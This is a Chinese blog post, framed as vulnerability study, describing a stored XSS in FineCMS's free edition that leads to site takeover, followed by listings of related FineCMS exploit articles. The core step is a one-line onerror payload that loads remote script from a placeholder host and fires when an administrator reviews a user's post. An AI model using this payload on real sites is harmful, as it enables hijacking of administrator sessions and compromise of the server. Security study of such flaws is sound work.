【漏洞学习——XSS】fineCMS免费版xss+getshell

最新推荐文章于 2025-09-16 15:55:41 发布
原创 最新推荐文章于 2025-09-16 15:55:41 发布 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细描述了一种通过在用户注册并发表的文章中注入恶意脚本来利用XSS漏洞的方法,进而实现对后台的攻击,最终获取Shell权限的过程。关键步骤包括修改图片地址加入onerror属性,触发管理员审核漏洞,以及利用后台XSS进一步操作。

漏洞细节

注册一个用户,在发表文章的地方发表文章
在编辑器里加入一张图片
用firebug修改图片地址 加入onerror属性
onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'

因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞

然后是getshell
有了后台xss都好办
在修改版权处

保存以后

Finecms SQL注入漏洞 (CVE-2018-6893)
m0_65150886的博客
01-08 1567
借此漏洞,可导致数据库中存放的用户的隐私信息的泄露,严重的可导致网页篡改;网站被挂马,传播恶意软件;修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;服务器被远程控制,被安装后门。Finecms 5.2.0版本中的controllers/member/Api.php文件存在SQL注入漏洞,该漏洞源于程序没有进行有效的过滤。远程攻击者可利用该漏洞执行SQL命令。1.访问http://ip:port,出现如下页面,开始实验。
FineCMS 5.0.10 多个 漏洞详细分析过程
xiaoi123的博客
11-20 3490
i春秋作家:F0rmat 0x01 前言 已经一个月没有写文章了,最近发生了很多事情,水文一篇。 今天的这个CMS是FineCMS,版本是5.0.10版本的几个漏洞分析,从修补漏洞前和修补后的两方面去分析。 文中的evai是特意写的,因为会触发论坛的防护机制,还有分页那一段的代码也去掉了,因为会触发论坛分页的bug。 0x02 环境搭建 https://www.ichunqiu.co...
手把手带你搞懂XSS之Flash弹窗钓鱼和文件上传getshell各种操作,网络安全零基础入门到精通教程建议收藏!
最新发布
qq_41314882的博客
09-16 736
本文介绍了XSS和文件上传漏洞的组合攻击方式,主要包括: 通过上传HTML/SVG文件实现XSS攻击,演示了SVG文件弹窗实例; 利用PDF文件实现XSS攻击的方法,提供了PDF木马制作教程; CSV文件上传可能导致命令执行漏洞; 详细演示了Flash弹窗钓鱼攻击流程,从XSS漏洞利用到伪造Flash网站; 分享了PDF木马制作过程,通过插入JS代码实现弹窗效果。 文章结合理论讲解和实战演示,展示了多种文件上传漏洞XSS结合的渗透测试技巧,并提供了相关工具和测试思路。
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系优快云管理员删除
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9942
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
finecms XSSCVE-2017-11629
qq_23003811的博客
07-17 744
Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。dayrui FineCms 5.0.10及之前的版本。四、漏洞复现(怎么拿flag)?
finecms aip.php漏洞,代码审计| FineCMSGetShell姿势
weixin_42311115的博客
03-11 528
0x00 背景上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。0x01 审计过程0x00 相关环境源码信息:FineCMS v5.3.0 bulid 20180206问题文件: \finecms\finecms\system\cor...
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 2037
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
代码审计学习phpcms头像上传漏洞
m0_46467017的博客
08-16 1374
究竟是什么原因造成了这个漏洞,究其根本还是以为你将用户不安全的POST数据写入了文件,并解压到web目录下了。世界上有无数种方法可以避免这个问题,web目录下随便写文件真的好吗?为何你不把压缩包放进tmp目录里,如果上传、解压缩的操作都能在tmp目录里完成,再把我们需要的头像文件拷贝到web目录中,还会有这么麻烦的安全问题吗?phpcms已经彻底抛弃了解压缩的方式,直接在前端将图片处理完成后进行上传。......
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6527
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell漏洞
weixin_32943857的博客
03-11 729
前言跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。漏洞详情代码位置和代码位置\finecms\dayrui\controllers\member\Api.php代码public function down_file() {$p = ar...
最新版完全开源免费好用的FineCMS
11-09
FineCMS免费版是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案,适用于小型站点、企业级网站、新闻内容网站等,个人站长及中小企业的首选建站系统。
finecms的csrf漏洞CVE-2018-18191)
FODKING的博客
12-10 3869
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
finecms-XSS(cve-2017-11629)
m0_65150886的博客
01-08 1388
dayrui FineCms 5.0.10及之前的版本中的controllers/api.php文件存在跨站脚本漏洞。远程攻击者可借助c=api&m=data2请求中的‘function’参数利用该漏洞注入任意的Web脚本或HTML。Dayrui FineCms是中国天睿(Dayrui)程序设计团队发布的一套使用MVC架构和PDO数据库接口开发的内容管理系统(CMS)。借此漏洞,攻击者可以窃取用户Cookie;2.对输入和URL参数进行过滤(白名单和黑名单)1.访问http://ip:port,进入首页。
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 659
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
finecms aip.php漏洞,FineCMS最新getshell漏洞通杀FineCMS5.0.8一下版本 | CN-SEC 中文网
weixin_39610229的博客
03-11 339
摘要在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.public function down_file() { $p = ar...
[zkaq靶场]FineCMS的存储型XSS
wwxxee
05-09 2206
Fine CMS 存储型xss漏洞 本地测试 安装(版本v5.3.0) tip:这个cms需要安装在网站根目录,不能安装在子目录 然后访问install.php开始安装。 完成安装,访问后台。默认账户密码:admin/admin。 网站后台:提供错误日志查看功能。 在错误日志页面,我们可以看到错误日志的存放位置:WWW/cache/errorlog/log-2021-03-26.php 我们可以查看一下这个文件,然后输入一些内容测试一下。 在该文件的最后一行加入了测试内容 可以发现,后台的错误日志
finecms aip.php漏洞,FineCMS最新版5.0.8两处getshell(附python批量poc脚本)
weixin_36474966的博客
03-11 860
0x01 前言就要被**,美其名曰:比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火,找到六处漏洞,先放两处容易被发现的getshell和对应的两个python脚本0x02 getshell第一处getshell:在C:phpStudyWWWfinecmsdayruicontrollersApi.php中的data2函数,大约在第115行,有问题的代码大约在1...
XSS漏洞检测新工具——XSS-Scan深入研究
从给定的文件信息中,我们可以提炼出关于Web漏洞爬虫工具的相关知识点,具体涉及到XSS漏洞的产生、利用方式、检测机制以及网络爬虫技术在安全审计中的应用。 首先,我们需要明确XSS漏洞(跨站脚本攻击)的定义。XSS...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值